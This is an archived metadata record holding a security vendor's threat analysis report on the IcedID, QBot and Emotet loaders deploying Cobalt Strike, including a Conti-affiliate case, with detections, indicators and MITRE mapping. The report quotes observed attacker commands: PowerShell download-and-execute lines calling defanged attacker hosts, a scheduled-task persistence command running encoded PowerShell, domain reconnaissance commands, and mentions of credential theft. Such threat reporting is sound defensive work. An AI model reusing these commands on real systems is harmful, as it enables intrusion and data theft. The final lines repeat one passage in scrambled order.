{
	"id": "6ee73192-55f5-42b3-b5df-a6bbf425310e",
	"created_at": "2026-04-06T00:08:41.793395Z",
	"updated_at": "2026-04-10T13:11:45.633256Z",
	"deleted_at": null,
	"sha1_hash": "b2dce0510a73d9a78a757dbfb1e0b32294419dd7",
	"title": "THREAT ANALYSIS: Cobalt Strike - IcedID, Emotet and QBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3435387,
	"plain_text": "THREAT ANALYSIS: Cobalt Strike - IcedID, Emotet and QBot\r\nBy Cybereason Global SOC Team\r\nArchived: 2026-04-05 21:05:32 UTC\r\nThe Cybereason Global Security Operations Center Team (GSOC) issues Cybereason Threat Analysis reports to inform on\r\nimpacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for\r\nprotecting against them. \r\nIn this Threat Analysis report, the GSOC provides details about three recent attack scenarios where fast-moving malicious\r\nactors used the malware loaders IcedID, QBot, and Emotet to deploy the Cobalt Strike framework on the compromised\r\nsystems.\r\nThe deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack due to the framework’s\r\nhigh damage potential. One of the attack scenarios that we discuss in this article involves affiliates of the Conti ransomware\r\ngroup.\r\ncobalt strike Key Points\r\nFast-moving adversaries: The threat actors conducted malicious activities in the compromised systems after only\r\napproximately 8 minutes after infecting the systems with the malware loader IcedID, QBot, or Emotet. The malicious\r\nactors deployed Cobalt Strike up to approximately 2 hours after accessing the compromised systems.\r\nTargeted phishing emails: Malicious actors, who we attribute as affiliates of the Conti ransomware group,\r\nspecifically targeted a user by sending the user an email with an attachment (an Excel document) that was almost\r\nidentical to a legitimate email and email attachment already distributed to other users within the organization. The\r\ndifference was that the attached Excel document contained a malicious macro that distributed IcedID.\r\nDetected and prevented: The Cybereason XDR Platform effectively detects and prevents the IcedID, QBot, and\r\nEmotet malware. \r\nCybereason Managed Detection and Response (MDR): The Cybereason GSOC has zero tolerance towards attacks\r\nthat involve malware loaders, such as IcedID, QBot, and Emotet, and categorizes such attacks as critical, high-severity incidents. The Cybereason GSOC MDR Team issues a comprehensive report to customers when such an\r\nincident occurs. The report provides an in-depth overview of the incident, which helps scope the extent of\r\ncompromise and the impact on the customer’s environment. In addition, the report provides attribution information\r\nwhen possible as well as recommendations for mitigating and isolating the threat.\r\nIntroduction to cobalt strike\r\nCobalt Strike is an adversary simulation framework with the primary use case of assisting red team operations. However,\r\nCobalt Strike is also actively used by malicious actors for conducting post-intrusion malicious activities. Cobalt Strike is a\r\nmodular framework with an extensive set of features that are useful to malicious actors, such as command execution,\r\nprocess injection, and credential theft.\r\nThe deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack: for example, once\r\nCobalt Strike runs on a compromised system, the Cobalt Strike operators can broker the system as an initial access point to\r\nother threat actors, including ransomware group affiliates.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 1 of 24\n\nIn the period between October 2021 and the time of writing this article, the Cybereason GSOC has observed multiple attack\r\nscenarios where malicious actors used malware that is capable of deploying additional malware on compromised systems\r\n(i.e. malware loaders) to deploy Cobalt Strike on the systems.\r\nIn this article, we present the activities of the malware loaders and the malicious actors that operated the loaders in three\r\nselected attack scenarios. Each scenario involves one of the malware loaders IcedID, QBot, and Emotet, and results in the\r\ndeployment of Cobalt Strike. One of the attack scenarios that we discuss in this article involves affiliates of the Conti\r\nransomware group.\r\nMalicious actors use the IcedID malware to distribute various types of malware, including ransomware, to compromised\r\nsystems. Malicious actors typically infect systems with IcedID through attachments, usually Microsoft Office documents, in\r\nphishing emails. Once deployed on a system, IcedID uses legitimate system utilities to conduct malicious activities, such as\r\nreconnaissance activities and disabling security mechanisms. Malicious actors also use the IcedID malware to deploy Cobalt\r\nStrike on compromised systems. \r\nQBot, also known as Qakbot, is a malware that has been present on the threat landscape since 2007. QBot originally\r\nfeatured information stealing and trojan functionalities, however, the malicious actors that develop QBot have extended the\r\nmalware with malware loading capabilities. In recent attack campaigns, malicious actors distribute QBot through malicious\r\nattachments in phishing emails. QBot downloads and executes additional malware on compromised machines, such as the\r\nCobalt Strike framework, and ransomware, such as REvil and ProLock. \r\nSince security researchers first discovered the Emotet malware in 2014, the malware has evolved from a traditional banking\r\nTrojan to a malware loader. Over the last few years, before authorities disrupted the infrastructure of Emotet operators as\r\npart of a global operation in the first quarter of 2021, malicious actors have been using Emotet to deliver the Ryuk\r\nransomware to compromised systems.\r\nOn November 15, 2021, security researchers announced the discovery of a new variant of Emotet on the threat landscape.\r\nThe Cybereason GSOC team observed attack scenarios that involved the new Emotet malware shortly thereafter, which\r\ninvolved Emotet deploying Cobalt Strike on compromised systems.\r\nAnalysis of COBALT STRIKE\r\nFrom IcedID to Cobalt Strike: Conti Ransomware Affiliates\r\nThe figure below depicts an infection using the IcedID malware that results in the deployment of Cobalt Strike. In this\r\nscenario, the malicious actors, who we attribute as affiliates of the Conti ransomware group, specifically targeted a user by\r\nsending the user an email with an attachment (an Excel document) that is almost identical to a legitimate email and email\r\nattachment already distributed to other users within the organization.\r\nThe difference was that the attached Excel document contained a malicious macro. This indicates a potential long-term\r\npresence of the actors in the environment:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 2 of 24\n\ninfection using the IcedID malware\r\nWhen the targeted user executed the macro, the macro downloaded the executable file of the IcedID malware from an\r\nattacker-controlled endpoint and then executed the file. The macro downloaded the IcedID executable to the home directory\r\nof the user, such as C:\\Users\\test\\javabridge64.exe, where javabridge64.exe is the name of the IcedID executable and\r\nC:\\Users\\test is the home directory of the user test:\r\nMalicious Office macro executes IcedID javabridge64.exe as seen in the Cybereason XDR Platform\r\nApproximately 8 minutes after the malicious Office macro executed IcedID, the malicious actors executed the SysInfo\r\nIcedID command to enumerate relevant system information, such as active processes, and to conduct the following\r\nreconnaissance activities:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 3 of 24\n\nIcedID executed the following command to retrieve a list of the security solutions that are installed on the\r\ncompromised system:\r\nwmic /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nIcedID executed the command ipconfig /all to retrieve the networking configuration of the compromised system.\r\nIcedID executed the systeminfo.exe Windows utility to retrieve detailed information about the compromised system,\r\nsuch as operating system version and hardware configuration.\r\nIcedID executed the following commands to retrieve Active Directory (AD)-related information:\r\nnet view /all\r\nnet view /all /domain\r\nnet config workstation\r\nnet group \"Domain Admins\" /domain\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 4 of 24\n\nIcedID reconnaissance activities as\r\nseen in the Cybereason XDR Platform\r\nApproximately 20 minutes after conducting reconnaissance activities, the malicious actors executed the ExecAdmin IcedID\r\ncommand that attempts to elevate user privileges using a known Windows User Account Control (UAC) bypass that\r\nleverages the fodhelper Windows utility. \r\nAfter approximately 5 minutes, the malicious actors executed the Exec IcedID command to execute code by injecting the\r\ncode into a cmd.exe instance. Approximately 21 minutes later, the malicious actors executed a Cobalt Strike loader using the\r\ncommand rundll32 adobe.dll,kasim (where kasim is a dynamic-link library - DLL - entry point):\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 5 of 24\n\nExecution of Cobalt Strike loader as seen in the Cybereason XDR Platform\r\nA few minutes after executing the Cobalt Strike loader, the actors downloaded and executed PowerShell code from the\r\nattacker-controlled endpoint with an IP address of 185.70.184[.]8 by executing the PowerShell command: \r\nIEX ((new-object net.webclient).downloadstring('http://185.70.184[.]8:80/a')). \r\nThis attributes the actors as Conti affiliates, since the Conti group operated the endpoint with the IP address 185.70.184[.]8\r\nin the week when the attack that we discussed took place. In addition, the security community has observed Conti affiliates\r\nusing the IcedID malware to deploy Cobalt Strike on compromised systems.\r\nTo deploy the IcedID malware, the Conti affiliates targeted a particular user. At a larger scale, in the middle of 2021, we\r\nobserved malicious actors deploying the IcedID malware on systems as part of the “stolen images evidence” campaign,\r\nwhich we discuss in the following section.\r\nStolen Images Evidence Campaign\r\nThis “stolen images evidence” campaign involved phishing emails that legitimate organization contact forms had generated\r\nand sent to the targeted users – the contact form recipient. The emails contained legal threats related to copyright\r\ninfringement due to the use of copyright-protected images that the targeted user had apparently stolen. The emails urged the\r\nrecipient to sign into a Google page that supposedly lists the images. After the user signed into the page using valid Google\r\ncredentials, the page downloaded and executed a malicious JavaScript (.js) script using the Windows wscript utility. \r\nThe script executed a Base64-encoded PowerShell command to download and execute the IcedID malware, for example:\r\nIEX(New-Object Net.WebClient).downloadString('http://minerdone[.]top/222g100/index.php’).\r\nThe execution of this PowerShell command led to downloading and executing a DLL through the DllRegisterServer entry\r\npoint, such as:\r\nrundll32.exe C:\\Users\\user\\AppData\\Local\\Temp\\VhfNmz.dat,DllRegisterServer.\r\nThis DLL conducted the first stage of deployment of the IcedID malware and we refer to it as first-stage IcedID DLL:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 6 of 24\n\nDownload and execution of first-stage IcedID DLL as seen in the Cybereason XDR Platform\r\nThe first-stage DLL gathered information about the compromised machine, such as hardware and operating system\r\ninformation, and downloaded data from an attacker-controlled endpoint, such as grenademetto[.]uno. The data was\r\nencrypted using a symmetric encryption key. \r\nThe first-stage IcedID DLL decrypted the data that it had downloaded, which contained a DLL file and a data file that\r\ntypically had the name license.dat. The first-stage IcedID DLL typically wrote the DLL file in the user’s %LocalAppData%\r\ndirectory, such as:\r\nC:\\Users\\user\\AppData\\Local\\Temp\\rebuildx32.tmp, and the license.dat file in the user’s %AppData% directory. \r\nThe first-stage IcedID DLL then executed the DLL file, such as:\r\nrundll32.exe “C:\\Users\\user\\AppData\\Local\\Temp\\rebuildx32.tmp\",update /i:\"ApproveFinish\\license.dat\", which we refer\r\nto as second-stage IcedID DLL.\r\nThe main functionality of the second-stage IcedID DLL was to locate and process the license.dat file. license.dat contained\r\nencrypted content that implemented the IcedID malware. The second-stage IcedID DLL decrypted the content of license.dat\r\nand executed the IcedID malware by injecting the malware into a legitimate Windows process, such as chrome.exe:\r\nSecond-stage\r\nIcedID DLL injects IcedID into chrome.exe as seen in the Cybereason XDR Platform\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 7 of 24\n\nFrom QBot to Cobalt Strike\r\nThe figure below depicts an infection using the QBot malware that results in the deployment of Cobalt Strike:\r\nAn infection using the QBot malware\r\nMalicious actors distribute QBot as attachments, typically Microsoft Office Excel documents, to phishing emails. The Office\r\nExcel application prompts the user that has opened the document that distributes QBot to enable Office macro execution.\r\nWhen the Office macro executes, the macro first downloads the QBot malware from an attacker-controlled endpoint and\r\nthen executes the malware. \r\nIn the attack scenario that we analyzed, the macro stored the file that implements the QBot malware in the %ProgramData%\r\ndirectory, such as C:\\ProgramData, with the filename extension .ocx - Volet1.ocx (other names include, for example,\r\nVolet2.ocx and Volet3.ocx). The .ocx file was a Windows DLL file that the macro executed using the regsvr32 Windows\r\nutility. The DLL unpacked and loaded a Windows DLL named stager_1.dll that implements the main QBot functionalities.\r\nIn addition, the DLL injected stager_1.dll into a legitimate Windows process - msra.exe:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 8 of 24\n\nOffice Excel macro executes QBot as seen in the Cybereason XDR Platform\r\nApproximately 6 minutes after injecting stager_1.dll into msra.exe, Qbot conducted reconnaissance activities by executing\r\nthe commands net, arp, ipconfig, netstat, nslookup, route, and whoami. The figure below depicts the execution of these\r\ncommands, including command line parameters:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 9 of 24\n\nQbot reconnaissance activities as seen in the Cybereason XDR Platform\r\nApproximately 1 minute after conducting reconnaissance activities, QBot established persistence on the compromised\r\nsystem by executing the following command:\r\nschtasks.exe /Create /F /TN \"{AO8F7C8F-D95F-4395-8732-9818EO0F3DB2}\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -\r\nCommand IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path\r\nHKCU:\\SOFTWARE\\Cvdijvkees).omowidpdnpcwb))) \" /SC MINUTE /MO 30\r\nThis command creates a scheduled task named {AO8F7C8F-D95F-4395-8732-9818EO0F3DB2} that periodically executes\r\nBase64-encoded PowerShell code stored in the registry key HKEY_CURRENT_USER\\SOFTWARE\\Cvdijvkees.\r\nApproximately 48 minutes after creating a scheduled task, Qbot injected Rubeus, a tool for attacking Kerberos deployments,\r\ninto the legitimate Windows Update process wuauclt.exe. After approximately 18 minutes, QBot stole web browser data,\r\nsuch as cookies and browsing history, using the recovery functionality of the esentutl Windows utility. \r\nAfter approximately 2 minutes, QBot attempted to exploit the PrintNightmare vulnerability by executing the Invoke-Nightmare PowerShell command to create an administrative user with the username admin1 and password Password. \r\nAfter approximately 48 minutes, QBot injected a Cobalt Strike module into msra.exe that contacted attacker-controlled\r\nendpoints known to be associated with Cobalt Strike at the time the attack took place:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 10 of 24\n\nQbot uses the esentutl Windows utility to steal web browser data (in the Cybereason XDR Platform)\r\nQbot injects Rubeus into wuauclt.exe and executes Invoke-Nightmare as seen in the Cybereason XDR Platform\r\nFrom Emotet to Cobalt Strike\r\nThe figure below depicts an infection using the Emotet malware that results in the deployment of Cobalt Strike:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 11 of 24\n\nAn infection using the Emotet malware\r\nMalicious actors distribute Emotet as attachments, typically Microsoft Office Word or Excel documents, to phishing emails.\r\nIn addition to Office documents, malicious actors distribute Emotet through links that lead to Office documents, archive files\r\nthat store Office documents, and Universal Windows Application installation packages that download and execute Emotet\r\nwhen a user executes the installation package:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 12 of 24\n\nPhishing email with attached Microsoft Word doc that distributes Emotet\r\nDistribution: Office Word Document\r\nIf an Office Word document distributes Emotet, the Office Word application first prompts the user that has opened the\r\ndocument to enable Office macro execution:\r\nOffice\r\nWord application prompts a user to enable macro execution\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 13 of 24\n\nWhen the user enables macro execution, a malicious Office macro that is part of the Word document and that distributes\r\nEmotet executes. The macro first deobfuscates macro code by removing character arrays, such as Cew (see the figure\r\nbelow), and then executes the deobfuscated macro code:\r\nImplementation of a malicious macro that distributes Emotet\r\nThe de-obfuscated macro code executes PowerShell code. The PowerShell code establishes a connection to an attacker-controlled endpoint and downloads Emotet to the %ProgramData% directory, such as C:\\ProgramData.\r\nEmotet typically arrives from the attacker-controlled endpoint in the form of a DLL file that the PowerShell code stores\r\nunder a random filename in the %ProgramData% directory. The PowerShell code then uses the rundll32 Windows utility to\r\nexecute Emotet:\r\nDe-obfuscated macro code executes PowerShell that downloads and executes Emotet  as seen in the Cybereason XDR\r\nPlatform\r\nAlternatively to executing the PowerShell code directly, the de-obfuscated macro code may first create a Windows Batch\r\n(.bat) file in the %ProgramData% directory under a random name, such as C:\\ProgramData\\sdfhiuwu.bat or yksds.bat, and\r\nthen execute the file. The .bat file stores obfuscated code that includes Base-64 encoded code and code that is stored in\r\nmultiple string variables.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 14 of 24\n\nThe obfuscated code in the .bat file executes the PowerShell code that downloads and then uses the rundll32 Windows\r\nutility to execute Emotet:\r\nDe-obfuscated macro code creates a Windows Batch file\r\nA Windows batch (.bat) file that contains obfuscated code\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 15 of 24\n\nExecution of .bat file (yksds.bat) that executes PowerShell code which downloads and executes Emotet as seen in the\r\nCybereason XDR Platform\r\nThe PowerShell code uses the rundll32 Windows utility and specifies the DLL entry point Control_RunDLL or\r\nDllRegisterServer to execute Emotet. We observed that rundll32 maps the Emotet DLL file under the internal name of X.dll:\r\nrundll32 executes Emotet: DllRegisterServer DLL entry point as seen in the Cybereason XDR Platform\r\nrundll32 maps an Emotet DLL file under the internal name of X.dll as seen in the Cybereason XDR Platform\r\nDistribution: Office Excel Document\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 16 of 24\n\nIf an Office Excel document distributes Emotet, the Office Excel application prompts the user that has opened the document\r\nto enable Office macro execution. The Excel document contains several hidden Excel worksheets that store malicious Office\r\nmacros that distribute Emotet.\r\nWhen the user enables macro execution, the Office macros execute:\r\nOffice Excel application prompts a user to enable macro execution\r\nThe macros establish a connection to an attacker-controlled endpoint to download the Emotet malware. Emotet typically\r\narrives from the attacker-controlled endpoint in the form of a DLL file that the macros store under a filename with the\r\nextension .ocx, such as besta.ocx, bestb.ocx, or bestc.ocx. \r\nThe macros use the rundll32 Windows utility and specify the DLL entry point Control_RunDLL or DllRegisterServer to\r\nexecute Emotet. The macros may obfuscate the DLL entry point name by appending the ampersand (\u0026) character to\r\nindividual characters of the name:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 17 of 24\n\nrundll32 executes Emotet: DllRegisterServer DLL entry point as seen in the Cybereason XDR Platform\r\nMalicious Activities\r\nWhen Emotet executes on a compromised system, the malware first establishes persistence by creating system services that\r\nstart at system startup or by creating registry values at the\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key:\r\nEmotet (DLL file: oxneternhgbtah.ybc) establishes persistence on compromised system as seen in the Cybereason XDR\r\nPlatform\r\nEmotet then executes processes that conduct malicious activities. The processes that Emotet executes have random names\r\nand are children processes of the process of the rundll32 utility that executes Emotet. \r\nIn the attack scenario that we analyzed, Emotet executed a process that steals cookies or web and email credentials from\r\nclient credential databases. Emotet used the keyword scomma in the process command line to execute\r\nWebBrowserPassView, a tool that steals web credentials from browser credential databases. Emotet then exfiltrated data\r\nfrom the compromised system to attacker-controlled endpoints:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 18 of 24\n\nEmotet executes processes that conduct\r\nmalicious activities as seen in the Cybereason XDR Platform\r\nEmotet executes the WebBrowserPassView tool as seen in the Cybereason XDR Platform\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 19 of 24\n\nEmotet exfiltrates data as seen in the Cybereason XDR Platform\r\nAfter Emotet exfiltrated data, the Emotet operators deployed the Cobalt Strike framework on the compromised system.\r\nEmotet deployed a Cobalt Strike beacon in the form of a DLL file and executed the beacon by invoking the\r\nDllRegisterServer DLL entry point.\r\nDetection and Prevention of emotet\r\nCybereason XDR Platform\r\nThe Cybereason XDR Platform is able to detect and prevent IcedID, QBot, and Emotet using multi-layer protection that\r\ndetects and blocks malware with threat intelligence, machine learning, and Next-gen Antivirus (NGAV) capabilities:\r\nCybereason XDR Platform detects IcedID injecting code into a cmd.exe instance\r\nCybereason XDR Platform detects IcedID executing a Cobalt Strike loader implemented in adobe.dll\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 20 of 24\n\nCybereason XDR Platform detects a malicious Office macro executing QBot using the regsvr32 Windows utility\r\nCybereason XDR Platform detects a malicious Office Excel document that distributes Emotet\r\nCybereason GSOC MDR\r\nThe Cybereason GSOC recommends the following:\r\nEnable the Anti-Malware feature in the Cybereason NGAV module and enable the Detect and Prevent modes of this\r\nfeature.\r\nSecurely handle email messages that originate from external sources. This includes disabling hyperlinks and\r\ninvestigating the content of email messages to identify phishing attempts.\r\nThreat Hunting with Cybereason: The Cybereason MDR team provides its customers with custom hunting queries for\r\ndetecting specific threats - to find out more about threat hunting and Managed Detection and Response with the\r\nCybereason Defense Platform, contact a Cybereason Defender here.\r\nFor Cybereason customers: More details available on the NEST including custom threat hunting queries for\r\ndetecting this threat.\r\nCybereason is dedicated to teaming up with defenders to end cyber attacks from endpoints to the enterprise to everywhere.\r\nSchedule a demo today to learn how your organization can benefit from an operation-centric approach to security.\r\nIndicators of Compromise\r\nExecutables SHA-1 hash: \r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 21 of 24\n\na4d415c07b4ff77c6bd792c32fc46bfc6a1b0354\r\nSHA-1 hash: \r\ne8992a283f9f37dec617b305db2790d9112d3a20\r\nDomains\r\nzasewalli[.]fun\r\nendofyour[.]ink\r\npedrosimanez[.]fun\r\nkingflipp[.]online\r\nbeliale232634[.]at\r\nbelialw869367[.]at\r\nbelialq449663[.]at\r\nIP Addresses\r\n23.111.114[.]52\r\n104.168.44[.]130\r\n185.70.184[.]8\r\nMITRE ATT\u0026CK Techniques: Cobalt Strike, IceID, Emotet and QBOT\r\nInitial Access Execution Persistence\r\nDefense\r\nEvasion\r\nCredential\r\nAccess\r\nDiscovery\r\nLateral\r\nMovement\r\nExfiltration\r\nPhishing:\r\nSpearphishing\r\nAttachment\r\nUser\r\nExecution:\r\nMalicious File\r\nScheduled\r\nTask/Job:\r\nScheduled\r\nTask\r\nAbuse\r\nElevation\r\nControl\r\nMechanism:\r\nBypass\r\nUser\r\nAccount\r\nControl\r\nCredentials\r\nfrom Web\r\nBrowsers\r\nAccount\r\nDiscovery\r\nRemote\r\nServices:\r\nRemote\r\nDesktop\r\nProtocol\r\nExfiltration\r\nOver\r\nAlternative\r\nProtocol\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 22 of 24\n\nWindows\r\nManagement\r\nInstrumentation\r\n \r\nSigned\r\nBinary\r\nProxy\r\nExecution:\r\nRegsvr32\r\n \r\nDomain\r\nTrust\r\nDiscovery\r\n   \r\n     \r\nSigned\r\nBinary\r\nProxy\r\nExecution:\r\nRundll32\r\n \r\nNetwork\r\nService\r\nScanning\r\n   \r\n     \r\nModify\r\nregistry\r\n \r\nRemote\r\nSystem\r\nDiscovery\r\n   \r\nAbout the Researchers:\r\nEli Salem, Senior Security Analyst, Cybereason Global SOC\r\nEli is a lead threat hunter and malware reverse engineer at Cybereason. He has worked in the private sector of the cyber\r\nsecurity industry since 2017. In his free time, he publishes articles about malware research and threat hunting.\r\nAleksandar Milenkoski, Senior Malware and Threat Analyst, Cybereason Global SOC\r\nAleksandar Milenkoski is a Senior Malware and Threat Analyst with the Cybereason Global SOC team. He is involved\r\nprimarily in reverse engineering and threat research activities. Aleksandar has a PhD in system security. For his research\r\nactivities, he has been awarded by SPEC (Standard Performance Evaluation Corporation), the Bavarian Foundation for\r\nScience, and the University of Würzburg, Germany. Prior to Cybereason, his work focussed on research in intrusion\r\ndetection and reverse engineering security mechanisms of the Windows operating system.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 23 of 24\n\nBrian Janower, Security Analyst, Cybereason Global SOC\r\nBrian Janower is a Security Analyst with the Cybereason Global SOC team. He is involved in malware analysis and triages\r\nsecurity incidents effectively and precisely. Brian has a deep understanding of the malicious operations prevalent in the\r\ncurrent threat landscape. He is in the process of obtaining a Bachelor of Science degree in Systems Information \u0026 Cyber.\r\nYonatan Gidnian, Senior Security Analyst and Threat Hunter, Cybereason Global SOC\r\nYonatan Gidnian is a Senior Security Analyst and Threat Hunter with the Cybereason Global SOC team. Yonatan analyses\r\ncritical incidents and hunts for novel threats in order to build new detections. He began his career in the Israeli Air Force\r\nwhere he was responsible for protecting and maintaining critical infrastructures. Yonatan is passionate about malware\r\nanalysis, digital forensics, and incident response.\r\nRotem Rostami, Security Analyst, Cybereason Global SOC\r\nRotem Rostami is a Security Analyst with the Cybereason Global SOC (GSOC) team. She is involved in malware analysis\r\nactivities and triages security incidents effectively and precisely. Rotem has a deep understanding of the malicious\r\noperations prevalent in the current threat landscape. Rotem has been working in the cybersecurity industry since 2018.\r\nSource: https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 24 of 24\n\nIn the attack directory, such scenario that we as C:\\ProgramData, analyzed, the with the macro stored the filename extension file that implements .ocx - Volet1.ocx the QBot (other names malware in the include, %ProgramData% for example,\nVolet2.ocx and Volet3.ocx). The .ocx file was a Windows DLL file that the macro executed using the regsvr32 Windows\nutility. The DLL unpacked and loaded a Windows DLL named stager_1.dll that implements the main QBot functionalities.\nIn addition, the DLL injected stager_1.dll into a legitimate Windows process -msra.exe:  \n    Page 8 of 24",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot"
	],
	"report_names": [
		"threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434121,
	"ts_updated_at": 1775826705,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b2dce0510a73d9a78a757dbfb1e0b32294419dd7.pdf",
		"text": "https://archive.orkl.eu/b2dce0510a73d9a78a757dbfb1e0b32294419dd7.txt",
		"img": "https://archive.orkl.eu/b2dce0510a73d9a78a757dbfb1e0b32294419dd7.jpg"
	}
}